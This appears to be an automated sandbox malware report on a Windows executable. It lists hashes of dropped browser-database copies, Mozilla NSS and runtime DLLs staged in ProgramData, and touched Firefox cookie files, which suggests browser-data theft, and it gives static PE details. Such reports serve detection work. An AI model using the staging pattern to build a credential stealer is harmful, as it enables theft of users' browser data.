SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBGCFBGCBFHJECBGDAKKJDGHII

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECGIIIDAKJDHJKFHIEBFCGHCGH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8508558324143882
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:	933D6D14518371B212F36C3835794D75
SHA1:	92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:	EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GCGCFCBAKKFBFIECAEBA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1717), with CRLF line terminators
Category:	dropped
Size (bytes):	10237
Entropy (8bit):	5.498288591230544
Encrypted:	false
SSDEEP:	192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
MD5:	0F58C61DE9618A1B53735181E43EE166
SHA1:	CC45931CF12AF92935A84C2A015786CC810AEC3A
SHA-256:	AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
SHA-512:	DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\GIIEGHIDBGHIECAAECGDAEHDHJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKEGDHCF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: g4Cyr2T5jq.exe, Detection: malicious, Browse Filename: NK3SASJheq.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: g4Cyr2T5jq.exe, Detection: malicious, Browse Filename: NK3SASJheq.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.946470716370808
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'866'752 bytes
MD5:	37f84f1ce614d05fdd3bd682b3815785
SHA1:	32b380d6e0f64eefbc758810cc6108ee0911617b
SHA256:	591adf3f95801872770c31f408cd3b34eb1fcef8b6eb4c9c4d9623b36f5c0f38
SHA512:	3ade5b2a0d5b2e338740ac11b27d911782ccdcb95a99c79d52b658b3f149679b65c5409146f6907612e7468e70e91da43911e55f1a8cbf6b8cdf3297c89413bc
SSDEEP:	49152:QUJhS6lZDqEERAPGvWDNd+rFrsQCwiwP4:QCxqEERIQoNIrd9a4
TLSH:	2E8533AD67423776C29D33B1BA2F77A5BDA099A24E217EDC19378536E92320737C4804
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xaa8000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F4224639DAAh
cvtps2pd xmm3, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F422463BDA5h
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
